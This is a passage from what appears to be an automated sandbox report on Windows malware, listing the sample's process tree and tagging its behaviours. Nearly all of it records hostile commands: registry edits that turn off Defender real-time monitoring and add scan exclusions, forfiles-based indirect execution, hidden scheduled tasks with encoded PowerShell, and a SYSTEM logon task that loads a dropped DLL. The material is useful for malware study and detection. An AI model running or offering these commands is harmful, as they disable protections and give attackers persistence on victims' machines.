      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3028
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2636
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3024
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2792
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gorTIGEYU" /SC once /ST 04:18:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gorTIGEYU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gorTIGEYU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1196
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  PID:2464
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:284
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1284
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gpxHGJqtY" /SC once /ST 10:35:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gpxHGJqtY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gpxHGJqtY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:600
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
  2⤵
  - Indirect Command Execution
  - System Location Discovery: System Language Discovery
  PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
    3⤵
    PID:1904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2068
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1900
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1008
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:3064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2576
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\YIXdnjwIixpMFthL\FNJJDCvD\QpWreiYGzIDLTOYE.wsf"
  2⤵
  PID:2184
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\YIXdnjwIixpMFthL\FNJJDCvD\QpWreiYGzIDLTOYE.wsf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:3000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UQYVlFmkpVlhWwVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YIXdnjwIixpMFthL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2300
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gGcfaOYOL" /SC once /ST 09:02:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2204
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gGcfaOYOL"
  2⤵
  PID:1644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gGcfaOYOL"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2176
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  2⤵
  PID:2196
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1940
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2292
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XzTTGfRHhsSQnOLDY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1464
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1500
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XzTTGfRHhsSQnOLDY2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FWbuSwfZFsgwoXKWz"
  2⤵
  PID:2932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz"
  2⤵
  PID:3040
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FWbuSwfZFsgwoXKWz2"
  2⤵
  PID:2776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz2"
  2⤵
  PID:3028
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QARjdqhHkeUSJySsU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QARjdqhHkeUSJySsU"
  2⤵
  PID:1572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QARjdqhHkeUSJySsU2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QARjdqhHkeUSJySsU2"
  2⤵
  PID:2496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "fQYKPzMybePlvBGQCyc"
  2⤵
  PID:2800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc"
  2⤵
  PID:1228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "fQYKPzMybePlvBGQCyc2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc2"
  2⤵
  PID:1088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FIPQnGcqMxrFEWDuliU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FIPQnGcqMxrFEWDuliU2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU2"
  2⤵
  PID:2092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YIKgGKXxRbHNIaIyYyL"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2864
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL"
  2⤵
  PID:2416
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YIKgGKXxRbHNIaIyYyL2"
  2⤵
  PID:1692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL2"
  2⤵
  PID:2732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YjQMAHbWU\tahjDA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GqmqubHZBeiIxpo" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "OQOjSEtbMvvyYjD"
  2⤵
  PID:2964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OQOjSEtbMvvyYjD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "OQOjSEtbMvvyYjD2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2172
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OQOjSEtbMvvyYjD2"
  2⤵
  PID:1624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FKVxFcymEbpqvaq"
  2⤵
  PID:2812
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FKVxFcymEbpqvaq"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FKVxFcymEbpqvaq2"
  2⤵
  PID:2276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FKVxFcymEbpqvaq2"
  2⤵
  PID:3036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "rOGhtOyMLHtWlf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2164
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "rOGhtOyMLHtWlf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "geJJKyFMaGRjIf"
  2⤵
  PID:1752
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "geJJKyFMaGRjIf"
  2⤵
  PID:2336
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "iSixUSrJJvCYJ"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "iSixUSrJJvCYJ"
  2⤵
  PID:2600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "iSixUSrJJvCYJ2"
  2⤵
  PID:2356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "iSixUSrJJvCYJ2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vZzcwClkycEgo"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:268
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vZzcwClkycEgo"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vZzcwClkycEgo2"
  2⤵
  PID:600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vZzcwClkycEgo2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GqmqubHZBeiIxpo2" /F /xml "C:\Program Files (x86)\YjQMAHbWU\UvHLSvA.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1628
